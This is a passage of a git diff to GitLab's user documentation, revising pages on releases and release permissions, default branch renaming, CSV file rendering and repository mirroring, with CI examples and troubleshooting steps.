a/doc/user/project/releases/index.md b/doc/user/project/releases/index.md index 71cbff9e545..3a25b148fdf 100644 --- a/doc/user/project/releases/index.md +++ b/doc/user/project/releases/index.md @@ -14,8 +14,11 @@ To introduce a checkpoint in your source code history, you can assign a However, in most cases, your users need more than just the raw source code. They need compiled objects or other assets output by your CI/CD system. -A GitLab *Release* is a snapshot of the source, build output, artifacts, and other metadata -associated with a released version of your code. +A GitLab Release can be: + +- A snapshot of the source code of your repository. +- [Generic packages](../../packages/generic_packages/index.md) created from job artifacts. +- Other metadata associated with a released version of your code. You can create a GitLab release on any branch. When you create a release: @@ -59,8 +62,8 @@ You can create a release in the user interface, or by using the We recommend using the API to create releases as one of the last steps in your CI/CD pipeline. -Only users with Developer permissions or higher can create releases. -Read more about [Release permissions](../../../user/permissions.md#project-members-permissions). +Only users with at least the Developer role can create releases. +Read more about [Release permissions](#release-permissions). To create a new release through the GitLab UI: @@ -79,7 +82,7 @@ To create a new release through the GitLab UI: > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/19298) in GitLab 12.7. -You can [create a release directly from the GitLab CI pipeline](../../../ci/yaml/README.md#release) +You can [create a release directly from the GitLab CI pipeline](../../../ci/yaml/index.md#release) by using a `release` node in the job definition. The release is created only if the job processes without error. If the Rails API returns an error @@ -99,8 +102,8 @@ release tag. When the `released_at` date and time has passed, the badge is autom > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26016) in GitLab 12.6. Asset link editing was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9427) in GitLab 12.10. -Only users with Developer permissions or higher can edit releases. -Read more about [Release permissions](../../../user/permissions.md#project-members-permissions). +Only users with at least the Developer can edit releases. +Read more about [Release permissions](#release-permissions). To edit the details of a release: @@ -242,7 +245,7 @@ but are _not_ allowed to view details about the Git repository (in particular, tag names). Because of this, release titles are replaced with a generic title like "Release-1234" for Guest users to avoid leaking tag name information. -See the [Permissions](../../permissions.md#project-members-permissions) page for +See the [Release permissions](#release-permissions) section for more information about permissions. ### Tag name @@ -273,14 +276,28 @@ Release note descriptions are unrelated. Description supports [Markdown](../../m A release contains the following types of assets: - [Source code](#source-code) -- [Permanent links to release assets](#permanent-links-to-release-assets) +- [Link](#links) #### Source code GitLab automatically generates `zip`, `tar.gz`, `tar.bz2`, and `tar` archived source code from the given Git tag. These are read-only assets. -#### Permanent links to release assets +#### Links + +A link is any URL which can point to whatever you like: documentation, built +binaries, or other related materials. These can be both internal or external +links from your GitLab instance. +Each link as an asset has the following attributes: + +| Attribute | Description | Required | +| ---- | ----------- | --- | +| `name` | The name of the link. | Yes | +| `url` | The URL to download a file. | Yes | +| `filepath` | The redirect link to the `url`. See [this section](#permanent-links-to-release-assets) for more information. | No | +| `link_type` | The content kind of what users can download via `url`. See [this section](#link-types) for more information. | No | + +##### Permanent links to release assets > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27300) in GitLab 12.9. @@ -289,20 +306,6 @@ GitLab always redirects this URL to the actual asset location, so even if the assets move to a different location, you can continue to use the same URL. This is defined during [link creation](../../../api/releases/links.md#create-a-link) or [updating](../../../api/releases/links.md#update-a-link). -Each asset has a `name`, a `url` of the *actual* asset location, and optionally, -`filepath` and `link_type` parameters. - -A `filepath` creates a URL pointing to the asset for the Release. - -The `link_type` parameter accepts one of the following four values: - -- `runbook` -- `package` -- `image` -- `other` (default) - -This field has no effect on the URL and it's only used for visual purposes in the Releases page of your project. - The format of the URL is: ```plaintext @@ -329,13 +332,104 @@ https://gitlab.com/gitlab-org/gitlab-runner/releases/v11.9.0-rc2/downloads/binar The physical location of the asset can change at any time and the direct link remains unchanged. -### Links +##### Link Types -A link is any URL which can point to whatever you like: documentation, built -binaries, or other related materials. These can be both internal or external -links from your GitLab instance. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207257) in GitLab 13.1. The four types of links are "Runbook," "Package," "Image," and "Other." +The `link_type` parameter accepts one of the following four values: + +- `runbook` +- `package` +- `image` +- `other` (default) + +This field has no effect on the URL and it's only used for visual purposes in the Releases page of your project. + +##### Use a generic package for attaching binaries + +You can use [generic packages](../../packages/generic_packages/index.md) +to store any artifacts from a release or tag pipeline, +that can also be used for attaching binary files to an individual release entry. +You basically need to: + +1. [Push the artifacts to the Generic Package Registry](../../packages/generic_packages/index.md#publish-a-package-file). +1. [Attach the package link to the release](#links). + +The following example generates release assets, publishes them +as a generic package, and then creates a release: + +```yaml +stages: + - build + - upload + - release + +variables: + # Package version can only contain numbers (0-9), and dots (.). + # Must be in the format of X.Y.Z, i.e. should match /\A\d+\.\d+\.\d+\z/ regular expresion. + # See https://docs.gitlab.com/ee/user/packages/generic_packages/#publish-a-package-file + PACKAGE_VERSION: "1.2.3" + DARWIN_AMD64_BINARY: "myawesomerelease-darwin-amd64-${PACKAGE_VERSION}" + LINUX_AMD64_BINARY: "myawesomerelease-linux-amd64-${PACKAGE_VERSION}" + PACKAGE_REGISTRY_URL: "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/myawesomerelease/${PACKAGE_VERSION}" + +build: + stage: build + image: alpine:latest + rules: + - if: $CI_COMMIT_TAG + script: + - mkdir bin + - echo "Mock binary for ${DARWIN_AMD64_BINARY}" > bin/${DARWIN_AMD64_BINARY} + - echo "Mock binary for ${LINUX_AMD64_BINARY}" > bin/${LINUX_AMD64_BINARY} + artifacts: + paths: + - bin/ + +upload: + stage: upload + image: curlimages/curl:latest + rules: + - if: $CI_COMMIT_TAG + script: + - | + curl --header "JOB-TOKEN: ${CI_JOB_TOKEN}" --upload-file bin/${DARWIN_AMD64_BINARY} ${PACKAGE_REGISTRY_URL}/${DARWIN_AMD64_BINARY} + - | + curl --header "JOB-TOKEN: ${CI_JOB_TOKEN}" --upload-file bin/${LINUX_AMD64_BINARY} ${PACKAGE_REGISTRY_URL}/${LINUX_AMD64_BINARY} + +release: + # Caution, as of 2021-02-02 these assets links require a login, see: + # https://gitlab.com/gitlab-org/gitlab/-/issues/299384 + stage: release + image: registry.gitlab.com/gitlab-org/release-cli:latest + rules: + - if: $CI_COMMIT_TAG + script: + - | + release-cli create --name "Release $CI_COMMIT_TAG" --tag-name $CI_COMMIT_TAG \ + --assets-link "{\"name\":\"${DARWIN_AMD64_BINARY}\",\"url\":\"${PACKAGE_REGISTRY_URL}/${DARWIN_AMD64_BINARY}\"}" \ + --assets-link "{\"name\":\"${LINUX_AMD64_BINARY}\",\"url\":\"${PACKAGE_REGISTRY_URL}/${LINUX_AMD64_BINARY}\"}" +``` + +PowerShell users may need to escape the double quote `"` inside a JSON +string with a `` ` `` (back tick) for `--assets-link` and `ConvertTo-Json` +before passing on to the `release-cli`. +For example: + +```yaml +release: + script: + - $env:asset = "{`"name`":`"MyFooAsset`",`"url`":`"https://gitlab.com/upack/artifacts/download/$env:UPACK_GROUP/$env:UPACK_NAME/$($env:GitVersion_SemVer)?contentOnly=zip`"}" + - $env:assetjson = $env:asset | ConvertTo-Json + - release-cli create --name $CI_COMMIT_TAG --description "Release $CI_COMMIT_TAG" --ref $CI_COMMIT_TAG --tag-name $CI_COMMIT_TAG --assets-link=$env:assetjson +``` + +NOTE: +Directly attaching [job artifacts](../../../ci/pipelines/job_artifacts.md) +links to a release is not recommended, because artifacts are ephemeral and +are used to pass data in the same pipeline. This means there's a risk that +they could either expire or someone might manually delete them. ## Release evidence @@ -428,14 +522,14 @@ Evidence collection snapshots are visible on the Releases page, along with the t > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32773) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.2. -When you create a release, if [job artifacts](../../../ci/yaml/README.md#artifactsreports) are included in the last pipeline that ran, they are automatically included in the release as release evidence. +When you create a release, if [job artifacts](../../../ci/yaml/index.md#artifactsreports) are included in the last pipeline that ran, they are automatically included in the release as release evidence. Although job artifacts normally expire, artifacts included in release evidence do not expire. To enable job artifact collection you need to specify both: -1. [`artifacts:paths`](../../../ci/yaml/README.md#artifactspaths) -1. [`artifacts:reports`](../../../ci/yaml/README.md#artifactsreports) +1. [`artifacts:paths`](../../../ci/yaml/index.md#artifactspaths) +1. [`artifacts:reports`](../../../ci/yaml/index.md#artifactsreports) ```yaml ruby: @@ -455,7 +549,7 @@ release evidence. If you [schedule release evidence collection](#schedule-release-evidence-collection), some artifacts may already be expired by the time of evidence collection. To avoid this you can use -the [`artifacts:expire_in`](../../../ci/yaml/README.md#artifactsexpire_in) +the [`artifacts:expire_in`](../../../ci/yaml/index.md#artifactsexpire_in) keyword. Learn more in [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/222351). ### Schedule release evidence collection @@ -471,6 +565,49 @@ In the API: - If you do not specify a `released_at` date, release evidence is collected on the date the release is created. +## Release permissions + +> [The permission model for create, update and delete actions was fixed](https://gitlab.com/gitlab-org/gitlab/-/issues/327505) in GitLab 14.1. + +### View a release and download assets + +- Users with [Reporter role or above](../../../user/permissions.md#project-members-permissions) + have read and download access to the project releases. +- Users with [Guest role](../../../user/permissions.md#project-members-permissions) + have read and download access to the project releases, however, + repository-related information are redacted (for example the Git tag name). + +### Create, update, and delete a release and its assets + +- Users with [Developer role or above](../../../user/permissions.md#project-members-permissions) + have write access to the project releases and assets. +- If a release is associated with a [protected tag](../protected_tags.md), + the user must be [allowed to create the protected tag](../protected_tags.md#configuring-protected-tags) too. + +As an example of release permission control, you can allow only +[Maintainer role or above](../../../user/permissions.md#project-members-permissions) +to create, update, and delete releases by protecting the tag with a wildcard (`*`), +and set **Maintainer** in the **Allowed to create** column. + +#### Enable or disable protected tag evaluation on releases **(FREE SELF)** + +Protected tag evaluation on release permissions is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) +can opt to disable it. + +To enable it: + +```ruby +Feature.enable(:evalute_protected_tag_for_release_permissions) +``` + +To disable it: + +```ruby +Feature.disable(:evalute_protected_tag_for_release_permissions) +``` + ## Release Command Line > [Introduced](https://gitlab.com/gitlab-org/release-cli/-/merge_requests/6) in GitLab 12.10. @@ -494,14 +631,13 @@ These metrics include: - Total number of releases in the group - Percentage of projects in the group that have at least one release -<!-- ## Troubleshooting +## Troubleshooting + +### Getting `403 Forbidden` or `Something went wrong while creating a new release` errors when creating, updating or deleting releases and their assets -Include any troubleshooting steps that you can foresee. If you know beforehand what issues -one might have when setting this up, or when something is changed, or on upgrading, it's -important to describe those, too. Think of things that may go wrong and include them here. -This is important to minimize requests for support, and to avoid doc comments with -questions that you know someone might ask. +If the release is associted with a [protected tag](../protected_tags.md), +the UI/API request might result in an authorization failure. +Make sure that the user or a service/bot account is allowed to +[create the protected tag](../protected_tags.md#configuring-protected-tags) too. -Each scenario can be a third-level heading, e.g. `### Getting error message X`. -If you have none to add when creating a doc, leave this section in place -but commented out to help encourage others to add to it in the future. --> +See [the release permissions](#release-permissions) for more information. diff --git a/doc/user/project/repository/branches/default.md b/doc/user/project/repository/branches/default.md index 6c2469ac377..2f1171a7d4f 100644 --- a/doc/user/project/repository/branches/default.md +++ b/doc/user/project/repository/branches/default.md @@ -57,9 +57,7 @@ GitLab administrators can configure a new default branch name at the ### Instance-level custom initial branch name **(FREE SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/221013) in GitLab 13.2. -> - It's deployed behind a feature flag, enabled by default. -> - It cannot be enabled or disabled per-project. -> - It's recommended for production use. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/325163) in GitLab 13.12. GitLab [administrators](../../../permissions.md) of self-managed instances can customize the initial branch for projects hosted on that instance. Individual @@ -154,8 +152,45 @@ renames a Git repository's (`example`) default branch. 1. Update references to the old branch name in related code and scripts that reside outside your repository, such as helper utilities and integrations. +## Default branch rename redirect + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/329100) in GitLab 14.1 + +URLs for specific files or directories in a project embed the project's default +branch name, and are often found in documentation or browser bookmarks. When you +[update the default branch name in your repository](#update-the-default-branch-name-in-your-repository), +these URLs change, and must be updated. + +To ease the transition period, whenever the default branch for a project is +changed, GitLab records the name of the old default branch. If that branch is +deleted, attempts to view a file or directory on it are redirected to the +current default branch, instead of displaying the "not found" page. + ## Resources - [Discussion of default branch renaming](https://lore.kernel.org/git/pull.656.v4.git.1593009996.gitgitgadget@gmail.com/) on the Git mailing list - [March 2021 blog post: The new Git default branch name](https://about.gitlab.com/blog/2021/03/10/new-git-default-branch-name/) + +## Troubleshooting + +### Unable to change default branch: resets to current branch + +We are tracking this problem in [issue 20474](https://gitlab.com/gitlab-org/gitlab/-/issues/20474). +This issue often occurs when a branch named `HEAD` is present in the repository. +To fix the problem: + +1. In your local repository, create a new, temporary branch and push it: + + ```shell + git checkout -b tmp_default && git push -u origin tmp_default + ``` + +1. In GitLab, proceed to [change the default branch](#change-the-default-branch-name-for-a-project) to that temporary branch. +1. From your local repository, delete the `HEAD` branch: + + ```shell + git push -d origin HEAD + ``` + +1. In GitLab, [change the default branch](#change-the-default-branch-name-for-a-project) to the one you intend to use. diff --git a/doc/user/project/repository/csv.md b/doc/user/project/repository/csv.md new file mode 100644 index 00000000000..4bf6c7451d5 --- /dev/null +++ b/doc/user/project/repository/csv.md @@ -0,0 +1,24 @@ +--- +stage: Create +group: Source Code +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# CSV files **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14174) in GitLab 14.1. + +A comma-separated values (CSV) file is a delimited text file that uses a comma to separate values. +Each line of the file is a data record. Each record consists of one or more fields, separated by +commas. The use of the comma as a field separator is the source of the name for this file format. +A CSV file typically stores tabular data (numbers and text) in plain text, in which case each line +will have the same number of fields. + +The CSV file format is not fully standardized. Other characters can be used as column delimiters. +Fields may or may not be surrounded to escape special characters. + +When added to a repository, files with a `.csv` extension are rendered as a table when viewed in +GitLab. + + diff --git a/doc/user/project/repository/img/csv_file_rendered_as_table_v14_1.png b/doc/user/project/repository/img/csv_file_rendered_as_table_v14_1.png Binary files differnew file mode 100644 index 00000000000..0f9b623e7b4 --- /dev/null +++ b/doc/user/project/repository/img/csv_file_rendered_as_table_v14_1.png diff --git a/doc/user/project/repository/img/repository_mirroring_pull_settings_lower.png b/doc/user/project/repository/img/repository_mirroring_pull_settings_lower.png Binary files differdeleted file mode 100644 index a3e0b74ddf8..00000000000 --- a/doc/user/project/repository/img/repository_mirroring_pull_settings_lower.png +++ /dev/null diff --git a/doc/user/project/repository/img/repository_mirroring_pull_settings_upper.png b/doc/user/project/repository/img/repository_mirroring_pull_settings_upper.png Binary files differdeleted file mode 100644 index 8e15b5a0784..00000000000 --- a/doc/user/project/repository/img/repository_mirroring_pull_settings_upper.png +++ /dev/null diff --git a/doc/user/project/repository/img/repository_mirroring_push_settings.png b/doc/user/project/repository/img/repository_mirroring_push_settings.png Binary files differdeleted file mode 100644 index 8916d21d515..00000000000 --- a/doc/user/project/repository/img/repository_mirroring_push_settings.png +++ /dev/null diff --git a/doc/user/project/repository/index.md b/doc/user/project/repository/index.md index 7919850b8cc..afdcf2a94fa 100644 --- a/doc/user/project/repository/index.md +++ b/doc/user/project/repository/index.md @@ -38,10 +38,10 @@ to a branch in the repository. When you use the command line, you can commit mul In GitLab, you can add keywords to the commit message to perform one of the following actions: - **Trigger a GitLab CI/CD pipeline:** - If the project is configured with [GitLab CI/CD](../../../ci/README.md), + If the project is configured with [GitLab CI/CD](../../../ci/index.md), you trigger a pipeline per push, not per commit. - **Skip pipelines:** - Add the [`ci skip`](../../../ci/yaml/README.md#skip-pipeline) keyword to + Add the [`ci skip`](../../../ci/yaml/index.md#skip-pipeline) keyword to your commit message to make GitLab CI/CD skip the pipeline. - **Cross-link issues and merge requests:** Use [cross-linking](../issues/crosslinking_issues.md#from-commit-messages) diff --git a/doc/user/project/repository/repository_mirroring.md b/doc/user/project/repository/repository_mirroring.md index e9f214f08ce..71bece03a33 100644 --- a/doc/user/project/repository/repository_mirroring.md +++ b/doc/user/project/repository/repository_mirroring.md @@ -11,13 +11,16 @@ Repository mirroring allows for the mirroring of repositories to and from extern can use it to mirror branches, tags, and commits between repositories. It helps you use a repository outside of GitLab. -A repository mirror at GitLab updates automatically. You can also manually trigger an update -at most once every five minutes on GitLab.com with [the limit set by the administrator on self-managed instances](../../../administration/instance_limits.md#pull-mirroring-interval). +A repository mirror at GitLab updates automatically. You can also manually trigger an update: + +- At most once every five minutes on GitLab.com. +- According to a [limit set by the administrator](../../../administration/instance_limits.md#pull-mirroring-interval) + on self-managed instances. There are two kinds of repository mirroring supported by GitLab: -- [Push](#pushing-to-a-remote-repository): for mirroring a GitLab repository to another location. **(FREE)** -- [Pull](#pulling-from-a-remote-repository): for mirroring a repository from another location to GitLab. **(PREMIUM)** +- [Push](#push-to-a-remote-repository): for mirroring a GitLab repository to another location. +- [Pull](#pull-from-a-remote-repository): for mirroring a repository from another location to GitLab. When the mirror repository is updated, all new branches, tags, and commits are visible in the project's activity feed. @@ -48,9 +51,9 @@ The following are some possible use cases for repository mirroring: GitLab.com repository that's public, allows you to open source specific projects and contribute back to the open source community. -## Pushing to a remote repository **(FREE)** +## Push to a remote repository -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/40137) in GitLab 13.5: LFS support over HTTPS. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/40137) in GitLab 13.5: LFS support over HTTPS. For an existing project, you can set up push mirroring as follows: @@ -63,8 +66,6 @@ For an existing project, you can set up push mirroring as follows: 1. Select the **Keep divergent refs** check box, if desired. 1. Select **Mirror repository** to save the configuration. - - When push mirroring is enabled, only push commits directly to the mirrored repository to prevent the mirror diverging. @@ -72,7 +73,7 @@ Unlike [pull mirroring](#how-it-works), the mirrored repository is not periodica The mirrored repository receives all changes only when: - Commits are pushed to GitLab. -- A [forced update](#forcing-an-update) is initiated. +- A [forced update](#force-an-update) is initiated. Changes pushed to files in the repository are automatically pushed to the remote mirror at least: @@ -82,14 +83,14 @@ Changes pushed to files in the repository are automatically pushed to the remote In the case of a diverged branch, an error displays in the **Mirroring repositories** section. -### Configuring push mirrors through the API +### Configure push mirrors through the API You can also create and modify project push mirrors through the [remote mirrors API](../../../api/remote_mirrors.md). ### Keep divergent refs -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/208828) in GitLab 13.0. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/208828) in GitLab 13.0. By default, if any ref on the remote mirror has diverged from the local repository, the *entire push* fails, and no updates occur. @@ -108,11 +109,11 @@ update. NOTE: After the mirror is created, this option can only be modified via the [API](../../../api/remote_mirrors.md). -### Setting up a push mirror from GitLab to GitHub +### Set up a push mirror from GitLab to GitHub To set up a mirror from GitLab to GitHub, you need to follow these steps: -1. Create a [GitHub personal access token](https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token) with the `public_repo` box checked. +1. Create a [GitHub personal access token](https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token) with the `public_repo` box checked. 1. Fill in the **Git repository URL** field using this format: `https://<your_github_username>@github.com/<your_github_group>/<your_github_project>.git`. 1. Fill in **Password** field with your GitHub personal access token. 1. Select **Mirror repository**. @@ -121,7 +122,7 @@ The mirrored repository is listed. For example, `https://*****:*****@github.com/ The repository pushes shortly thereafter. To force a push, select the **Update now** (**{retry}**) button. -### Setting up a push mirror from GitLab to AWS CodeCommit +### Set up a push mirror from GitLab to AWS CodeCommit AWS CodeCommit push mirroring is the best way to connect GitLab repositories to AWS CodePipeline, as GitLab isn't yet supported as one of their Source Code Management (SCM) providers. @@ -203,7 +204,7 @@ To test mirroring by forcing a push, select the half-circle arrows button (hover If **Last successful update** shows a date, you have configured mirroring correctly. If it isn't working correctly, a red `error` tag appears and shows the error message as hover text. -### Setting up a push mirror to another GitLab instance with 2FA activated +### Set up a push mirror to another GitLab instance with 2FA activated 1. On the destination GitLab instance, create a [personal access token](../../profile/personal_access_tokens.md) with `write_repository` scope. 1. On the source GitLab instance: @@ -211,7 +212,7 @@ If it isn't working correctly, a red `error` tag appears and shows the error mes 1. Fill in the **Password** field with the GitLab personal access token created on the destination GitLab instance. 1. Select **Mirror repository**. -## Pulling from a remote repository **(PREMIUM)** +## Pull from a remote repository **(PREMIUM)** > - [Added Git LFS support](https://gitlab.com/gitlab-org/gitlab/-/issues/10871) in GitLab 11.11. > - Moved to GitLab Premium in 13.9. @@ -224,7 +225,7 @@ to browse its content and its activity using the GitLab interface, you can confi mirror pulling: 1. If you [configured two-factor authentication (2FA)](https://docs.github.com/en/github/authenticating-to-github/securing-your-account-with-two-factor-authentication-2fa) - for GitHub, create a [personal access token for GitHub](https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token) + for GitHub, create a [personal access token for GitHub](https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token) with the `read_repository` scope. If 2FA is enabled, this personal access token serves as your GitHub password. 1. In your project, go to **Settings > Repository**, and then expand the @@ -238,18 +239,12 @@ mirror pulling: - **Only mirror protected branches** 1. Select **Mirror repository** to save the configuration. - - ---- - - - Because GitLab is now set to pull changes from the upstream repository, you should not push commits directly to the repository on GitLab. Instead, any commits should be pushed to the remote repository. Changes pushed to the remote repository are pulled into the GitLab repository, either: - Automatically in a certain period of time. -- When a [forced update](#forcing-an-update) is initiated. +- When a [forced update](#force-an-update) is initiated. WARNING: If you do manually update a branch in the GitLab repository, the branch becomes diverged from @@ -273,7 +268,7 @@ Repository mirrors are updated as Sidekiq becomes available to process them. If ### Overwrite diverged branches **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. You can choose to always update your local branches with remote versions, even if they have diverged from the remote. @@ -285,7 +280,7 @@ To use this option, check the **Overwrite diverged branches** box when creating ### Trigger pipelines for mirror updates **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. If this option is enabled, pipelines trigger when branches or tags are updated from the remote repository. Depending on the activity of the remote @@ -295,7 +290,7 @@ assigned when you set up pull mirroring. ### Hard failure **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. After 14 consecutive unsuccessful retries, the mirroring process is marked as a hard failure and mirroring attempts stop. This failure is visible in either the: @@ -303,11 +298,11 @@ and mirroring attempts stop. This failure is visible in either the: - Project's main dashboard. - Pull mirror settings page. -You can resume the project mirroring again by [forcing an update](#forcing-an-update). +You can resume the project mirroring again by [forcing an update](#force-an-update). ### Trigger an update using the API **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. Pull mirroring uses polling to detect new branches and commits added upstream, often minutes afterwards. If you notify GitLab by [API](../../../api/projects.md#start-the-pull-mirroring-process-for-a-project), @@ -317,18 +312,19 @@ For more information, see [Start the pull mirroring process for a Project](../.. ## Mirror only protected branches **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. Based on the mirror direction that you choose, you can opt to mirror only the -[protected branches](../protected_branches.md) from/to your remote repository. -For pull mirroring, non-protected branches are not mirrored and can diverge. +[protected branches](../protected_branches.md) in the mirroring project, +either from or to your remote repository. For pull mirroring, non-protected branches in +the mirroring project are not mirrored and can diverge. To use this option, check the **Only mirror protected branches** box when creating a repository mirror. **(PREMIUM)** ## SSH authentication -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22982) in GitLab 11.6 for Push mirroring. +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22982) in GitLab 11.6 for Push mirroring. SSH authentication is mutual: @@ -369,7 +365,7 @@ fingerprints in the open for you to check: - [AWS CodeCommit](https://docs.aws.amazon.com/codecommit/latest/userguide/regions.html#regions-fingerprints) - [Bitbucket](https://support.atlassian.com/bitbucket-cloud/docs/configure-ssh-and-two-step-verification/) -- [GitHub](https://docs.github.com/en/github/authenticating-to-github/githubs-ssh-key-fingerprints) +- [GitHub](https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/githubs-ssh-key-fingerprints) - [GitLab.com](../../gitlab_com/index.md#ssh-host-keys-fingerprints) - [Launchpad](https://help.launchpad.net/SSHFingerprints) - [Savannah](http://savannah.gnu.org/maintenance/SshAccess/) @@ -417,7 +413,7 @@ NOTE: The generated keys are stored in the GitLab database, not in the file system. Therefore, SSH public key authentication for mirrors cannot be used in a pre-receive hook. -## Forcing an update **(FREE)** +## Force an update **(FREE)** While mirrors are scheduled to update automatically, you can always force an update by using the update button which is available on the **Mirroring repositories** section of the **Repository Settings** page. @@ -426,7 +422,7 @@ update button which is available on the **Mirroring repositories** section of th ## Bidirectional mirroring **(PREMIUM)** -> - Moved to GitLab Premium in 13.9. +> Moved to GitLab Premium in 13.9. WARNING: Bidirectional mirroring may cause conflicts. @@ -450,13 +446,17 @@ protected branches. ### Configure a webhook to trigger an immediate pull to GitLab -Assuming you have already configured the [push](#setting-up-a-push-mirror-to-another-gitlab-instance-with-2fa-activated) and [pull](#pulling-from-a-remote-repository) mirrors in the upstream GitLab instance, to trigger an immediate pull as suggested above, you must configure a [Push Event Web Hook](../integrations/webhooks.md#push-events) in the downstream instance. +Assuming you have already configured the [push](#set-up-a-push-mirror-to-another-gitlab-instance-with-2fa-activated) +and [pull](#pull-from-a-remote-repository) mirrors in the upstream GitLab instance, to trigger an +immediate pull as suggested above, you must configure a [Push Event Web Hook](../integrations/webhooks.md#push-events) +in the downstream instance. To do this: 1. Create a [personal access token](../../profile/personal_access_tokens.md) with `API` scope. 1. In your project, go to **Settings > Webhooks**. -1. Add the webhook URL which (in this case) uses the [Pull Mirror API](../../../api/projects.md#start-the-pull-mirroring-process-for-a-project) request to trigger an immediate pull after updates to the repository. +1. Add the webhook URL which (in this case) uses the [Pull Mirror API](../../../api/projects.md#start-the-pull-mirroring-process-for-a-project) + request to trigger an immediate pull after updates to the repository. ```plaintext https://gitlab.example.com/api/v4/projects/:id/mirror/pull?private_token=<your_access_token> @@ -467,7 +467,7 @@ To do this: To test the integration, select the **Test** button and confirm GitLab doesn't return an error message. -### Preventing conflicts using a `pre-receive` hook +### Prevent conflicts using a pre-receive hook WARNING: The solution proposed negatively affects the performance of @@ -550,7 +550,7 @@ Note that this sample has a few limitations: - The script circumvents the Git hook quarantine environment because the update of `$TARGET_REPO` is seen as a ref update, and Git displays warnings about it. -### Mirroring with Perforce Helix via Git Fusion **(PREMIUM)** +### Mirror with Perforce Helix via Git Fusion **(PREMIUM)** > Moved to GitLab Premium in 13.9. @@ -583,14 +583,52 @@ Should an error occur during a push, GitLab displays an **Error** highlight for ### 13:Received RST_STREAM with error code 2 with GitHub -If you receive an "13:Received RST_STREAM with error code 2" while mirroring to a GitHub repository, your GitHub settings might be set to block pushes that expose your email address used in commits. Either set your email address on GitHub to be public, or disable the [Block command line pushes that expose my email](https://github.com/settings/emails) setting. +If you receive a "13:Received RST_STREAM with error code 2" message while mirroring to a GitHub repository, +your GitHub settings might be set to block pushes that expose your email address used in commits. Either +set your email address on GitHub to be public, or disable the [Block command line pushes that expose my email](https://github.com/settings/emails) setting. ### 4:Deadline Exceeded -When upgrading to GitLab 11.11.8 or newer, a change in how usernames are represented means that you may need to update your mirroring username and password to ensure that `%40` characters are replaced with `@`. +When upgrading to GitLab 11.11.8 or newer, a change in how usernames are represented means that you +may need to update your mirroring username and password to ensure that `%40` characters are replaced with `@`. ### Connection blocked because server only allows public key authentication -As the error indicates, the connection is getting blocked between GitLab and the remote repository. Even if a [TCP Check](../../../administration/raketasks/maintenance.md#check-tcp-connectivity-to-a-remote-site) is successful, you must check any networking components in the route from GitLab to the remote Server to ensure there's no blockage. +As the error indicates, the connection is getting blocked between GitLab and the remote repository. Even if a +[TCP Check](../../../administration/raketasks/maintenance.md#check-tcp-connectivity-to-a-remote-site) is successful, +you must check any networking components in the route from GitLab to the remote Server to ensure there's no blockage. For example, we've seen this error when a Firewall was performing a `Deep SSH Inspection` on outgoing packets. + +### Could not read username: terminal prompts disabled + +If you receive this error after creating a new project using +[GitLab CI/CD for external repositories](../../../ci/ci_cd_for_external_repos/): + +```plaintext +"2:fetch remote: "fatal: could not read Username for 'https://bitbucket.org': terminal prompts disabled\n": exit status 128." +``` + +Check if the repository owner is specified in the URL of your mirrored repository: + +1. Go to your project. +1. In the left sidebar, select **Settings > Repository**. +1. Select **Mirroring repositories**. +1. If no repository owner is specified, delete and add the URL again in this format: + + ```plaintext + https://**<repo_owner>**@bitbucket.org/<accountname>/<reponame>.git + ``` + +The repository owner is needed for Bitbucket to connect to the repository for mirroring. + +### Pull mirror is missing LFS files + +In some cases, pull mirroring does not transfer LFS files. This issue occurs when: + +- You use an SSH repository URL. The workaround is to use an HTTPS repository URL instead. + There is [an issue to fix this for SSH URLs](https://gitlab.com/gitlab-org/gitlab/-/issues/11997). +- You're using GitLab 14.0 or older, and the source repository is a public Bitbucket URL. + This was [fixed in GitLab 14.0.6](https://gitlab.com/gitlab-org/gitlab/-/issues/335123). +- You mirror an external repository using object storage. + There is [an issue to fix this](https://gitlab.com/gitlab-org/gitlab/-/issues/335495). diff --git a/doc/user/project/requirements/index.md b/doc/user/project/requirements/index.md index d7fbff23e5e..4ac1113152c 100644 --- a/doc/user/project/requirements/index.md +++ b/doc/user/project/requirements/index.md @@ -122,7 +122,7 @@ You can also sort the requirements list by: > - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2859) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.1. > - 